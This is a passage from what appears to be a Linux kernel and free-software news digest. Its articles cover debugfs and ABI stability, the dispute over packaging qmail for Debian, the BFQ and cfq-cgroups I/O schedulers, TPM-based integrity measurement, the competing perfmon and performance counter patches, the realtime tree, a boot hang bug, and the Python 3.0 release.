usage of memory pools within the kernel.  Nobody really disagreed with the
idea of making this information available, but there were some grumbles
about putting it into /proc.  Once upon a time, just about
anything could go into that directory, but, in recent years, there has been
a real attempt to confine /proc to its original intent: providing
information about processes.  /proc/mempool is not about
processes, so it was considered procfile-non-grata.  It was suggested that
another home should be found for this file.

Where that other home should be is not obvious, though.  Somewhere like
/sys/kernel might seem to make sense, but sysfs has rules of its
own.  In particular, the one-value-per-file rule makes it hard to create an
easy file 
where developers can simply query the state of a kernel subsystem, so sysfs
is not a suitable home for this file either.

The next option is debugfs, which was created in December, 2004.
Debugfs is meant to be an aid for kernel developers; it explicitly
disclaims any rules on the types of files that can be put there.  All rules
except for one: debugfs is not a mandatory part of any kernel installation,
and nothing found therein should be considered to be a part of the stable
user-space ABI.  It is, instead, a dumping ground where kernel developers
can quickly export information which is useful to them.

Since debugfs is not a part of the user-space ABI, it seems like a poor
place to put things that users might depend on.  When this was pointed out,
it became clear that the non-ABI status of debugfs is not as well
established as one might think.  Quoting Matt
Mackall:


	The problem with debugfs is that it claims to not be an ABI but it
	is lying. Distributions ship tools that depend on portions of
	debugfs. And they also ship debugfs in their kernel. So it is
	effectively the same as /proc, except with the 1.0-era
	everything-goes attitude rather than the 2.6-era
	we-should-really-think-about-this one.

	Pushing stuff from procfs to debugfs is thus just setting us up for
	pain down the road. Don't do it. In five years, we'll discover we
	can't turn debugfs off or even clean it up because too much relies
	on it.


As an example, Matt pointed out the extensively-documented usbmon interface which
provides a great deal of information about what's happening on a USB bus.
If it is not an ABI, he says, nobody should be upset if he submits a patch
which breaks it.

That is a perennial problem with interfaces between the kernel and user
space; changing them causes 
pain for users.  That is why incompatible changes to user-space interfaces
are almost never allowed;
an important goal for the kernel development process is to avoid breaking
user-space programs.  One might think that this problem could be avoided
for a specific interface by explicitly documenting it as an unstable
interface.  The files in Documentation/ABI/testing are meant to serve that
role; anything found there should be considered to be unstable.  But, as
soon as people start using programs which depend on a specific interface,
it has, for all practical purposes, hardened into part of the kernel ABI. 

Linus put it this way:


	The fact that something is documented (whether correctly or not)
	has absolutely _zero_ impact on anything at all. What makes
	something an ABI is that it's useful and available. The only way
	something isn't an ABI is by _explicitly_ making sure that it's not
	available even by mistake in a stable form for binary use.

	Example: kernel internal data structures and function calls. We
	make sure that you simply _cannot_ make a binary that works across
	kernel versions.  That is the only way for an ABI to not form.


So a given kernel interface can be kept away from ABI status if it is so
hard to get to, and so unstable, that nothing ever comes to depend on it.
The kernel module interface certainly fits this bill.  Modules must
generally be built for the exact kernel they are intended to work with, and
they must often be built with the same configuration options and the same
compiler.  Anybody who has gotten into the dark business of distributing
binary-only modules has learned what a challenge it can be.

Debugfs is different, though.  It is enabled in a number of distributor
kernels, even if, perhaps, it is not mounted by default.  Once a set of
files gets placed there, their format tends to change rarely.  So it is
possible for people to write programs which depend on debugfs files.  And
the end result of that is that debugfs files can become part of the stable
kernel ABI.  That is generally not a result that was intended by anybody
involved, but it happens anyway.  The only way to avoid it would be to
deliberately shake up debugfs every kernel cycle - and few developers have
much desire to do that.

This is a discussion without a whole lot in the way of useful conclusions;
it leaves /proc/mempool without a home.  ABI design, it turns out,
is still hard.  In the longer term, dealing with an ABI which was never
really designed, but which just sort of settled into being, is even
harder.  There does not appear to be any substitute for thinking seriously
about every interface between kernel and user space, even if it's just for
a developer's debugging tool.

		Packaging qmail for Debian


An effort to get the qmail mail transfer agent (MTA) into
Debian repositories has run aground due to various concerns, but the
overriding one seems to be a distaste for qmail itself.  Distributions make
package availability decisions based on "taste" all the time, but they are
generally made strictly on technical grounds, which does not seem to be the
case here. While it
has its share of detractors, qmail is a relatively popular MTA—with
an excellent security track record—and one of the main impediments,
its license, has changed in the last year. Because of that, it makes it a
bit hard 
to understand why qmail would be kept out of Debian.


More than six months ago, Gerrit Pape had uploaded qmail and related
packages to the ftp-master system, but they have yet to be added to the
official Debian archive.  He recently outlined his efforts in a
post to debian-devel trying to see if he
could break a kind of standoff between him and the ftpmasters, who are the
folks that decide which
packages get moved into the official archives.  More than two months after
his first upload of the packages, Pape got a reply from Joerg Jaspert outlining multiple
technical reasons why the packages were being opposed, but also containing
the following disheartening verdict:

Aside from these technical - and possibly fixable - problems, we (as in the
ftpteam) have discussed the issue, and we are all of the opinion that qmail
should die, and not receive support from Debian. As such we *STRONGLY*
ask you to reconsider uploading those packages.


After that, Pape addressed some, but not all, of the technical complaints
and uploaded updated packages along with a reply
to Jaspert's rejection on September 1.  Since that time, there has been no
action on the packages 
nor any further communication from the ftpteam, which is what led to the
debian-devel post.  Responses there mostly backed the ftpmaster's
"decision"; qmail, it seems, is not very popular with many Debian developers.   


Unfortunately, some of the complaints are based on old or faulty
information.  There is a reasonably active upstream and, since Daniel
J. Bernstein (aka djb) released the code into the public domain, there is
no longer the need to patch qmail to get a sensible MTA.  There are some
legitimate concerns, in particular the backscatter that gets created by the
default qmail configuration, but it is rather disingenuous to list security
as one of those problems. 


While not as bulletproof as djb would have it,
qmail does have a long record of few security problems.  In response to
claims that the Debian security team would have more work because of
qmail's inclusion, Moritz Muehlenhoff makes it
clear that the team won't block qmail.  Florian Weimer puts it this way:

Like Moritz, I don't see issues with security support, provided that
the number of additional patches is rather small.  (To my knowledge,
badly patched qmail with a SMTP AUTH bypass vulnerability was one of
the few MTAs which were actually exploited to send spam in recent
times.)  I'm also not sure if upstream can be considered dead, and
arguments along that line are not very convincing because similar
criticism could be brought against our default MTA.

I can understand that people have strong feelings.  I'm willing to
provide security support, but it's extremely unlikely that I'll run
qmail on production MTAs ever again. 8-/


In the end, it comes down to emotions, largely.  People generally feel
strongly about qmail, either hating it or loving it, with few who know much
about it anywhere in between.  Clearly the ftpteam has the responsibility
to reject packages on technical grounds, but are they the arbiters of taste
for Debian as well?


An earlier thread
about including qmail, from shortly after djb freed the code, showed a
fair amount of interest in qmail, along with some opposition.  It is
unlikely that all Debian developers are happy with all of the packages
currently supported by the distribution, so singling qmail out seems rather
arbitrary.  As Wouter Verhelst notes:

As long as qmail is free, packaged
properly, and integrates well with the rest of Debian, I don't see why
anyone should oppose its packaging.

Whether or not it's a good MTA, the fact is that it's a *popular* MTA.
That alone should be a good reason to package it.


Installing qmail has always been painful; it is a package that cries out
for distribution integration, which Pape is trying to provide.  Whether it
gets into the official repositories or not, unofficial qmail packages do
exist.  If the problems with qmail are largely packaging-related, it is
hard to see how they will get fixed by staying unofficial.  But if the problems
are based on an emotional response to qmail itself—whether based in
technical concerns or not—it is hard to see how a developer can
overcome them.  


		Variations on fair I/O schedulers


An I/O scheduler is a subsystem of the kernel which schedules I/O
operations to
the various storage devices to get the best possible throughput from those
devices.
The algorithm is often reminiscent of the algorithm used by elevators when
dealing with requests coming from different floors to go up or down.
This is the reason I/O scheduling algorithms are also called
"elevators." I/O requests are submitted in an order designed to minimize
disk head movement (thus minimizing disk seek times), yet guaranteeing
good I/O rates. The next request chosen will be dependent on the current
disk head position, in order to service the requests quickly, and spend
less time seeking, or moving the disk head. However, algorithms
may also consider other aspects such as fairness or time guarantees. 

The Completely Fair Queuing (CFQ) I/O scheduler, is one of the most popular I/O
scheduling algorithms; it is used as the default scheduler in most
distributions. As the name suggests, the CFQ scheduler tries to
maintain fairness in its distribution of bandwidth to processes, and yet does not
compromise much on the throughput. The elevator's fairness is
accomplished by servicing all processes and not penalizing those
which have requests far from the current disk head position.
It grants a time slice to every process; 
once the task has consumed its slice, this slice is recomputed and task is
added to the end of the queue. 
The I/O priority is used to compute the time slice granted and the offset
in the request queue.

The Budget Fair Queuing scheduler

The time-based allocation of the disk service in CFQ, while having
the desirable effect of implicitly charging each application for
the seek time it incurs, still suffers from fairness problems, especially
towards processes which make the best possible use of the disk bandwidth.
If the same time slice is assigned to two processes,
they may each get different throughput, as a function of the
positions on the disk of their requests.  Moreover, due
to its round robin policy, CFQ is characterized by an O(N) worst-case
delay (jitter) in request completion time, where N is the number
of tasks competing for the disk.  

The Budget Fair Queuing (BFQ) 
scheduler, developed by Fabio Checconi and Paolo Valente,
changes the CFQ round-robin scheduling policy based on time slices into a
fair queuing policy based on sector budgets.  Each task is assigned a budget
measured in number of sectors instead of amount of time, and budgets
are scheduled using a slightly modified version of the Worst-case Fair
Weighted Fair Queuing+ (WF2Q+) algorithm (described in this paper
[compressed PS]), which
guarantees a worst case complexity of O(logN) and boils down to O(1)
in most cases. The budget assigned to each task varies over time as a
function of its behavior.  However, one can set the maximum value of
the budget that BFQ can assign to any task.

BFQ can provide strong guarantees on bandwidth distribution because the
assigned budgets are measured  sectors. There are limits, though: processes
spending 
too much time to exhaust their budget are penalized and the scheduler
selects the next process to dispatch I/O. The next budget is
calculated on the feedback provided by the request serviced.

BFQ also introduces I/O scheduling within control groups. Queues are collected
into a tree of groups, and there is a distinct B-WF2Q+ scheduler on each
non-leaf node. Leaf nodes are request queues as in the
non-hierarchical case. BFQ supports I/O priority classes at each hierarchy
level, enforcing a strict priority ordering among classes. This means
that idle queues or groups are served only if there are no best effort
queues or groups in the same control group, and best effort queues and groups are
served only if there are no real-time queues or groups. As compared to
cfq-cgroups (explained later), it lacks per device priorities. The
developers however claim that this feature can be incorporated easily.

Algorithm

Requests coming to an I/O scheduler fall into two categories,
synchronous and asynchronous. Synchronous requests are those for which
the application must wait before continuing to send further
requests - typically read requests. On the other hand, asynchronous
requests - typically writes - do not block the application's progress while
they are executed.
In BFQ, as in CFQ, synchronous requests are collected in per-task queues, while
asynchronous requests are collected in per-device (or, in the case of
hierarchical scheduling, per group) queues. 

When the underlying device
driver asks for the next request to serve and there is no queue being
served, BFQ uses B-WF2Q+, a modified version of WF2Q+, to choose a
queue. It then selects the first request from that queue in C-LOOK order
and returns it to the driver. C-LOOK is a disk scheduling algorithm,
where the next request picked is the one with the immediate next highest
disk sector to the current position of the disk head. Once the disk 
has serviced the maximum sector number in the request queue, it
positions the head to the sector number of the request having the
lowest sector number.

When a new queue is selected it is assigned a budget, in disk sector
units, decremented each time a request from the same queue is served.
When the device driver asks for new requests and there is a queue
under service, they are chosen from that queue until one of the
following conditions is met: (1) the queue exhausts its budget,
(2) the queue is spending too much time to consume its budget, or
(3) the queue has no more requests to serve

On termination of a request, the scheduler recalculates the
budget allocated to each process depending on the feedback it gets.
For example, for greedy processes which have exhausted their budgets,
the budget is increased, whereas if it has been idle for long, its
budget is decreased. The maximum budget a process can get is a
configurable system parameter (max_budget).  
Two other parameters, timeout_sync and timeout_async,
control the timeout time for consuming the budget of the synchronous and
asynchronous 
queues respectively. In addition, max_budget_async_rq limits the
maximum number of requests serviced from an asynchronous queue.

If a synchronous queue has no more requests to serve, but it has
some budget left, the scheduler idles (i.e., it tells to the device
driver that it has no requests to serve even if there are other active
queues) for a short period, in anticipation of a new request from the task
owning the queue.

Test Results

The developers compared  six different I/O scheduling algorithms: 
BFQ, YFQ,
SCAN-EDF, CFQ, the Linux anticipatory scheduler, and C-LOOK.
They compared a multitude of test scenarios analogous to
real-life scenarios, including throughput, bandwidth distribution,
latency, and short-term time
guarantees. With respect to bandwidth distribution, BFQ can be
concluded as the best, and a good algorithm for most scenarios.
There were also extensive tests comparing BFQ against CFQ, and the
results are available here.
The throughput of BFQ is more or less the same as CFQ, but it scores well in
distributing I/O bandwidth fairly among the processes, and  displays
lower latency with streaming data.

Using sector budgets instead of time as a factor of granting slice 
for fair bandwidth distribution is an interesting concept.
The algorithm also employs timeouts to terminate requests of "seeky"
processes taking too much time to consume their budget and penalizes
them. The feedback from current requests help determine future
budgets, making the algorithm self-learning. Such tighter bandwidths
distribution would be a requirement for systems running virtual
machines, or container classes. However, it depends on how BFQ stands
the test of time against the tried-and-tested stable CFQ.

See the
BFQ technical report [PDF] for (much) more information.


Expanded CFQ

Control Groups provide a mechanism for aggregating sets of tasks, and
all their future children, into hierarchical groups. These groups can
be allocated dedicated portions of the available resources, or
resource sharing can be prioritized within these groups. Control
groups are controlled by the cgroups pseudo-filesystem. Once mounted,
the top level directory shows the complete set of existing control
groups. Each directory made 
under the root filesystem makes a new group, and resources can be
allocated to the tasks listed in the tasks file in the individual
groups directory.

Control groups can be used to regulate access to CPU time, memory, and
more.  There are also several projects working toward the creation of I/O
bandwidth controllers for control groups.
One of those is
the expanded CFQ scheduler
patch for cgroups by Satoshi Uchida.

This patch set introduces a new I/O scheduler called cfq-cgroups,
which 
introduces cgroups for the I/O scheduling subsystem. 


This scheduler, as
the name suggests, is based on Completely Fair Queuing I/O scheduler.
It can take advantage of hierarchical scheduling of
processes, with respect to the cgroup they belong to, each cgroup
having its own CFQ scheduler.
I/O devices in a control group can be prioritized. The time slice
given to each hierarchical group per device is a function of the device
priority. This helps shaping of I/O bandwidth per group, per device.

Usage

To use, cfq-cgroups, select it as a default scheduler at
boot by passing elevator=cfq-cgroups as a boot parameter.
This can also be dynamically changed for individual devices by writing
cfq-cgroups to /sys/block/&lt;device&gt;/queue/scheduler.
There are two levels of control:
through the cgroups filesystem, for individual groups, and
through sysfs, for individual devices.

Like any other control group, cfq-cgroup is managed through the
cgroup pseudo-filesystem.
To access the cgroups, mount the pseudo cgroups filesystem:


The cgroup directory, by default, will have a file called
cfq.ioprio, which contains  the
individual priority on a per-device basis. The time slice received per
device per group is a function of the I/O priority listed in cfq.ioprio.
The tasks file represents the list of tasks in the particular group.
To make more groups, create a directory in the mounted cgroup
directory:


The new directories are automatically populated with files,
cfq.ioprio, tasks etc, which are used to control the
resources in this 
group. To add tasks in a group, write the process ID of the task to the
tasks file:


The cfq.ioprio file contains the list of devices and their respective
priorities. Each device in the cgroup has a default I/O priority of 3,
while the valid values are 0 to 7. To change the priority of a device for
the cgroup group1, run:


This would change the priority of the entire group. To change the I/O
priority of a specific device:


To change the default priority while keeping the priority of the
devices unchanged:


The device view shows the list of cgroups and their respective
priorities on a per-group basis. This can be changed by:


The device view contain other parameters similar to the CFQ scheduler,
such as back_seek_max or back_seek_penalty, which are
specific to the control of the individual device, same as the traditional
CFQ. 

Implementation

The patch introduces a new data structure called cfq_driver_data
for the 
control of I/O bandwidth for cgroups. All driver-related data has been
moved from the traditional cfq_data structure to
cfq_driver_data structure. Similarly, cfq_cgroups is a new data
structure to control 
the cgroup parameters. The organization of data can be assumed as
a matrix with cfq_cgroups as rows and cfq_driver_data as
columns, as 
shown in the diagram below. 


At each intersection, there is a cfqd_data
structure which is responsible for all CFQ related queue handling, so
that each cfq_data corresponds to  one cfq_cgroup and
cfq_driver_data combination.

When a new cgroup is created, the  cfq_data from
the parent cgroup is copied into the new group.  While inserting new nodes
of cfq_data into the 
cgroup, the cfq_data structure is initialized with the priority of
the cfq_cgroup.
This way all data of the parent is inherited by the child cgroup, and
shows up in the respective files per group in the cgroup filesystem.

Scheduling of cfq_data within the CFQ scheduler is similar to that
of the native CFQ scheduler. Each node is assigned a time slice.
This slice is calculated according to the I/O priority of the device, using
the per-device base time slice.  The time slice offset forms the key of
the red-black node to be inserted in the service tree.  One
cfq_data entry is
picked from the start of the red-black tree and scheduled.  Once its
time slice expires it is added to the tree again, after recalculation
of its time slice offset. So, each cfq_data structure acts as a
queue node per 
device, and, within each CFQ data structure, requests are queued as with a
regular CFQ queue. 

Both BFQ and cfq-cgroups are attempts to bring a higher degree of fairness
to I/O scheduling, with "fairness" being tempered by the desire to add more
administrative control via the control groups mechanism.  They both appear
to be useful solutions, but they must contend with the wealth of other I/O
bandwidth control implementations out there.  Coming to some sort of
consensus on which approach is the right one could prove to be a rather
longer process than simply implementing these algorithms in the first place.

		System integrity in Linux


Ensuring that a Linux system is only running "approved" programs—ones
that haven't been maliciously replaced—is one of the goals of the integrity patches currently
being proposed for the Linux mainline.  With some hardware assistance, in
the form of a Trusted
Platform Module (TPM) chip, systems will be able to
protect against unauthorized binaries as well as attest to other systems
that they are only running good code.  These patches have been around for a
number of years in various forms, but it would seem they are getting close
to being merged.  Perhaps more interestingly, we are starting to see them
be used by various projects.


Over on the kernel page, we have looked at the integrity patches several
times, most recently in March
2007.   The core idea is to complement mandatory access control (MAC)
systems, such as SELinux, by preventing attacks that are made when that
system isn't running—the machine has been booted with a different
kernel for example.  It is generally considered a security truism that
physical access to a device moots any security measures, but with a
properly outfitted TPM-based system, that is no longer the case.


Conceptually, there are two parts to the integrity feature.  One is the
extended verification module (EVM) that associates each file
with a hash that has been calculated over its contents and
metadata.  That hash is then signed by the TPM chip ensuring that
unauthorized changes will be noticed.
The other half
is the integrity measurement
architecture (IMA) which tracks the use of mmap().
IMA verifies the hashes of files that have been mapped in
executable mode and then keeps track of them in a way that the TPM can
sign.  EVM then provides the 
protection against tampering with binaries, while IMA can provide a signed
attestation of which executables have been run.


Previous incarnations of EVM and IMA used the Linux Security Modules (LSM)
interface, but that has a very unfortunate side effect: inability to also
run SELinux.  LSM code has no way to stack or cooperate, so there can only
be one module active at a time.  Since integrity and MAC are intended to
work together, this was seen as a rather serious impediment, so the most
recent versions add in hooks for Linux Integrity Modules (LIM).  IMA is
then added as a LIM integrity provider rather than as an LSM.


In response to an Andrew Morton query about the need for LIM/IMA (EVM has
been incorporated into IMA over time), David Safford listed several users of the code:

LIM/IMA's maintenance of a TPM hardware anchored file measurement 
list is fundamental to the Trusted Computing Group's standards 
efforts. Several projects have implemented the TNC (Trusted Network
Connect) and PTS (Platform Trust Services) standards (see below). 
There are three demo packaged distros which have integrated these
apps, two of which are government funded (EU and US), with definite
customer interest. We are working with the RHEL team to provide
a supported, patched kernel for HAP. All of these so far have used
the old LSM based IMA, and have asked for a supported, upstreamed 
implementation, with the ability to work with SELinux.


While that looks a bit like alphabet soup, there is a lot of useful
information there (and in his links further down in the post linked
above).  The biggest news is the three distributions that are implementing
"Trusted Computing".
The High
Assurance Platform (HAP) program is funded by the US National Security
Agency (NSA), the folks who brought us SELinux, while the Open Trusted Computing project is funded
by the European Commission.


While the security that can be provided by a Trusted Computing platform is
useful for some installations, there are some potential pitfalls as well.
Systems with TPM hardware can be configured to only run binaries that are
signed by some external authority.  If manufacturers were to enable that
functionality, but only provide the key to "trusted" software companies,
it would lead to a horrendous loss of freedom.  This is why some have
called it "Treacherous Computing".


There are numerous examples of systems that do not necessarily preserve
physical security, but that one might want to ensure were running the
proper code—voting and cash machines come quickly to mind.  For those
situations, as well as countless others, Trusted Computing will be a real
boon.  We just need to be vigilant so that hardware vendors (or, worse yet,
governments) don't start restricting what we can run on our own machines.


		Dueling performance monitors


Low-level optimization of performance-critical code can be a challenging
task.  At this point, one assumes, the potential for algorithmic
improvements in the targeted code has been realized; what is left is trying
to locate and address problems 
like cache misses, mis-predicted branches, and so on.  Such problems can be
impossible to find by just looking at the code; one needs support from the
hardware.  The good news is that contemporary hardware provides that
support; most processors can collect a wide range of performance data for
analysis.  The bad news is that, despite the fact that processors have been
able to collect that data for many years, there has never been support for
this kind of performance monitoring in the mainline kernel.  That situation
may be about to change, but, first, the development community will have to
make a choice between a venerable out-of-tree implementation and an
unexpected competitor.

The "perfmon" patch set has been under development for some years, but, for
a number of reasons, it has never found its way into the mainline kernel.
The most recent version of the patch was posted for review by
Stéphane Eranian in late
November.  The perfmon patches show the signs of all those years of
development work and
usage experience; they offer a wide set of features and extensive user-space
support.  The full perfmon patch adds twelve system calls to the kernel;
the posted version, though, trims that count back to five in the hope that
a narrower interface will have a better chance of getting into the
mainline.  The additional system calls, one assumes, will be proposed for
inclusion sometime after the perfmon core is merged.
The reduced interface is described in the
patch set; briefly, an application hooks into the performance
monitoring subsystem with a call to:


This system call returns a file descriptor to identify the performance
monitoring session.  The regs parameter is used to return a list
of performance monitoring registers available on the current system;
flags is currently unused.

Specific performance counter registers can be manipulated with:


These system calls can be used to write values into registers (thus
programming the performance monitoring hardware) and to read counter and
configuration information from those registers.

Actually doing some performance monitoring requires a couple more calls:


A call to pfm_attach() specifies which process is to be monitored;
pfm_set_state() then turns monitoring on and off.

There are a couple of distinctive aspects to the perfmon interface.  One is
that it knows almost nothing about the specific performance monitoring
registers; that information, instead, is expected to live in user space.
As a result, the bare perfmon system call interface is probably not
something that most monitoring applications would use; instead, those
system calls are hidden behind a user-space library which knows how to
program different types of processors for the desired results.  Beyond
that, perfmon uses the ptrace() mechanism to stop the monitored
process while performance counters are being queried; as a result, the
monitoring process must have the right to trace the target process.

On December 4, Thomas Gleixner and Ingo Molnar posted a surprise announcement of a new
performance counter subsystem.  The announcement states:


	We are aware of the perfmon3 patchset that has been submitted to
	lkml recently. Our patchset tries to achieve a similar end result,
	with a fundamentally different (and we believe, superior :-)
	design.


This is not the first time that these developers have shown up with an
out-of-the-blue reimplementation of somebody else's subsystem; other
examples include the CFS scheduler, high-resolution timers, dynamic tick,
and realtime preemption.  Most of the time, the new code quickly supplants
the older version - an occurrence which is not always pleasing to the
original developers - but the situation does not seem quite as
straightforward this time.

The proposed interface is much simpler,
adding a single system call:


This call will return a file descriptor corresponding to a single hardware
counter.  A call to read() will then return the current value of
the counter.  The hw_event_period can be used to block reads until
the counter overflows the given value, allowing, for example, events to be
queried in batches of 1000.  The pid parameter can be used to
target a specific process, and cpu can restrict monitoring to a
specific processor.

There are a few advantages claimed for the new implementation.  The
simplicity of the system call interface is one of those; it is possible to
write a very simple application to perform monitoring tasks, with no
additional libraries required.  The second version of the patch
includes a simple "kerneltop" utility which can display a
constantly-updated profile of anything the performance counting hardware
can monitor.  Another advantage is the avoidance of ptrace(); this
reduces the amount of privilege needed by the monitoring process and avoids
perturbing the monitored process by stopping and restarting it.  The
management of counters is said to be more flexible, with facilities for
sharing counters between processes and reserving them for administrative
access.  The low-level hardware interface is said to be simpler as well.

Those claimed advantages notwithstanding, a
number of complaints have been raised with regard to the new performance
monitoring code.  Two of those seem to be at the top of the list: the
single counter per file descriptor API, and programming the hardware
performance monitoring unit inside the kernel.  On the API side, the
biggest concern is that putting each counter behind its own file descriptor
makes it very hard to correlate two or more counters.  Reading two counters
requires two independent read() system calls; as is always the
case, just about anything could happen between those two calls.  So it's
hard to tell how two different counter values relate to each other.  But
that sort of correlation is exactly what developers doing performance
optimization want to do.  Paul Mackerras says:


	Your API has as its central abstraction the "counter".  I am saying
	that that is the wrong abstraction.  The abstraction really needs
	to be a set of counters that are all active over precisely the same
	interval, so that their values can be meaningfully compared and
	related to each other.


In response, Ingo argues that the loss of
precision caused by independent read() calls is small - much
smaller than the muddying of the results caused by stopping the target
process so that all of the counters can be read at the same time.  That
argument does not appear to have convinced the detractors, though.

The other complaint is that moving the counter programming task into the
kernel requires that the kernel know about the complexities of every
possible performance monitoring unit it may encounter.  This hardware sits
at the core of the most performance-critical CPU subsystems, so its design
parameters value non-interference above features or a straightforward
programming interface.  So programming it can be a complex business,
involving sizeable tables describing how various operations interact with
each other.  The perfmon code keeps those tables in a user-space library,
but the alternative implementation won't allow that.  Quoting Paul again:


	Now, the tables in perfmon's user-land libpfm that describe the
	mapping from abstract events to event-selector values and the
	constraints on what events can be counted together come to nearly
	29,000 lines of code just for the IBM 64-bit powerpc processors.

	Your API condemns us to adding all that bloat to the kernel, plus
	the code to use those tables.


Paul (and others) argue that this information - which can add up to
hundreds of kilobytes - is better kept in user
space.

There also seems to be a bit of concern over the fact that  Stéphane had clearly never heard about this work before it was
posted for review.  It must, indeed, be a shock to work on a subsystem for
years, then find a proposed replacement sitting in one's mailbox.  As David
Miller put it:


	And also, another part of the backlash is that the poor perfmon3
	person was completely blindsided by this new stuff.  Which to be
	honest was pretty unfair.  He might have had great ideas about the
	requirements (even if you don't give a crap about his approach to
	achieving those requirements) and thus could have helped avoid the
	past few days of churn.


So, at this point, what will happen with performance monitoring is unclear
at best.  Perhaps, though, this discussion will have the effect of raising
the profile of performance monitoring, which has been without proper kernel
support for many years.  The merging of either solution - or, perhaps, a
combination of both - seems like it has to be an improvement over having no
support at all.

		A new realtime tree


It has been just over four years, now, since the realtime discussion got
serious and the realtime preemption patch set got its start.  During
that time, your editor has heard many predictions for when the bulk of the
realtime work would be merged; generally, the guess has been "within about
a year."  While a lot of realtime work has been merged, some of the
core components of the realtime tree remain outside of the mainline.
Beyond that, the realtime developers have been relatively quiet over the
last year - at least on the realtime front.  Having taken on some little
side tasks - unifying the x86 architecture and maintaining it going
forward, for example 
- some of those developers have been just a little bit distracted recently.


The realtime patch set has not gone away, though.  If nothing else, the
fact that a number of distributors are shipping this code is enough to
ensure continued interest in its development.  So your editor noted with
interest the recent announcement
of a new -rt tree with an updated set of realtime patches.  This tree
will be of interest for anybody wanting to look at the realtime work in the
context of the 2.6.28 kernel or beyond.


One of the core technologies in the realtime tree is a change to how
spinlocks work.  Spinlocks in the mainline will busy-wait until the
required lock becomes available; they thus occupy the processor to no
useful end when acquiring a contended lock.  Holding a spinlock will also
prevent a thread from being preempted.  This behavior is generally best for
system throughput; it also makes it easier to write correct code.  But
anything which prevents a CPU from immediately servicing the
highest-priority process runs counter to the chief design goal of a
realtime operating system: providing deterministic response times in all
situations.  So, for the realtime patches, classic spinlocks had to go.


The solution was to turn most spinlocks into a form of mutex with priority
inheritance.  A process which attempts to acquire a contended "spinlock"
will no longer spin; instead, it goes to sleep and waits for the lock to
become free, making the processor available to another thread.  Code which
holds one of these non-spinlocks is no longer immune to preemption; a
higher-priority thread can always push it out of the way.  By changing
spinlocks in this way, the realtime hackers were able to eliminate one of
the largest sources of latency in the mainline kernel.
Much of that work found its way into the mainline some time ago in the form
of the mutex API, but spinlocks themselves have not been changed in the
mainline.  


To minimize the pain of maintaining the realtime patches, the
developers simply redefined the spinlock_t type to be the new
mutex type instead.  Except that, as it turns out, some spinlocks in
low-level parts of the kernel really do need to be spinlocks still.  So
those were switched to a new raw_spinlock_t type - but without
changing the various spin_lock() calls.  Instead, some truly
frightening macro trickery was introduced to cause the spinlock API to do
the right thing when passed either of two entirely different mutual
exclusion primitives.  This bit of macro magic was always going to be an
impediment to mainline inclusion, so the realtime developers never really
expected to merge the lock code in that form.

The new realtime tree now shows how the realtime developers think this work
might get into the mainline.  It involves a more explicit separation of the
two types of "spinlocks" - and a lot of code churn.  In the realtime tree,
most locks of type spinlock_t are changed to a new lock_t
type.  There is a new set of operations for this type:


For a normal, non-realtime kernel build, lock_t will be the same
as spinlock_t, and things will work as they always have.  On
realtime kernels, instead, lock_t will be a mutex type.  The other
variants of the spinlock API will be represented in the new API (there is
an acquire_lock_irqsave(), for example), but none of them will
actually disable interrupts in a realtime kernel.  Meanwhile,
spinlock_t will remain a true spinlock type.

This change gets rid of the tricky macros, but at the cost of changing the
declarations of and operations on almost all spinlocks in the kernel.  That
is a lot of code changes: a quick grep turns up over 20,000
spin_lock*() calls in the upcoming 2.6.28 kernel.  That will make
for some pain if and when this change is merged.  But in the mean time, it
can only make for a lot of pain for the people who have to maintain
this patch out of tree.  To make their lives a little easier, the realtime
developers have created a couple of scripts to do the bulk of the work.
First, all spinlocks in a pristine kernel are converted to lock_t,
then the few locks which truly must be spinlocks are switched back.  This
work is kept in a separate branch which is regenerated when needed; in this
way, the realtime developers avoid the need to do nasty merges to keep up
with current kernels.


Your editor has heard talk of another locking change which does not, yet,
appear in this tree.  One problem with the realtime patch set is that it
requires distributors to create yet another kernel build - something they
hate doing - if they want to
support realtime operation.  
In an effort to make life easier for distributors, the
realtime developers are working on a scheme whereby a kernel would
determine at run time whether it should be running in a realtime mode.  If
so, spinlocks will be changed to sleeping locks by patching the kernel
binary as it boots.  Kernels built this way will be able to run efficiently
in either mode.


The branches of the realtime tree provide a quick guide to the other parts
of the realtime work which remain outside of the mainline.  The threaded interrupt handler code
is one example; that change could be proposed (again) for merging in the
near future.  The priority
workqueue mechanism sits in another branch, as do patches aimed at Java
support, filesystem changes, memory management changes, and more.  Then,
there's a branch for stuff which will never be merged; for example, there
is this
patch which gives Java programs direct access to physical memory - not
something which strikes most kernel developers as a good idea.  All told,
there is a great deal of work sitting in the realtime patch set; this work
is finally being organized into a proper git tree.


The "upstream first" policy says that vendors should merge their code
upstream before shipping it to customers.  The 2.6.x development model is
built on the idea that no change is too fundamental to be accepted into a
regular, 3-month development cycle.  The realtime patches would appear to be
an exception to both rules.  It has taken over four years to get to a point
where some of the fundamental realtime technologies are close to ready for the mainline,
but distributors have been shipping it for at least three of those years.
It has, in other words, been one of the biggest forks of the Linux kernel,
ever.  The plan has always been to join this fork back with the mainline,
though; perhaps, finally, that goal is getting closer.  With luck, it will
happen within about a year.

		Tracking down a "runaway loop"


The Linux boot process, at least as provided by distributions,
depends on help from user space, with 
drivers being loaded as required from the initial filesystem (initramfs/initrd).
Loading drivers requires using tools built into initramfs and
if those tools break, the kernel won't boot.  But when a working kernel
configuration and initramfs are used with a new kernel, the result
is expected to be a kernel that successfully boots.  When that doesn't
happen, bugs are filed regarding kernel regressions but, as a recent
example shows, the actual problem may be elsewhere.


The original report was made in late
October, but no progress was made until Evgeniy Polyakov saw it again in early December.  The symptom
was a kernel that hangs after printing:

four times on the console.  Since nothing in the user space (initramfs)
or kernel configuration had changed, it seemed to clearly point to
something in the 
kernel itself.


It turns out that the "runaway loop" message is meant to indicate that the
request_module() function has been invoked recursively.  So in an
effort to load the driver for the character device with major/minor numbers
5/1—which corresponds to
/dev/console—request_module() was invoked again.
The code in kernel/kmod.c:  


		Python 3 is out - now what?


For some years now, the Python development community has been talking about
"Python 3000," the far-future release which would allow a complete
rethinking of the language to fix the various annoyances which had built up over
time.  On December 3, that talk came to fruition with the Python 3.0 release.  This
release is the end result of a great deal of thought and development; it
represents the vision Guido van Rossum and company have for the language
into the indefinite future.  Now that it's out, the Python community as a
whole appears to have stopped for a "now what?" moment.


The wider Python development community appears to be split into three camps on Python 3.0;
the situation amusingly resembles the classic folk tale "Goldilocks and the
three bears."  One set (the "too large" crowd) seems to think that an
incompatible version of Python should never have been released, that
languages should stay compatible forever.  Another group ("too small") can
handle the idea of an incompatible transition, but thinks that the Python
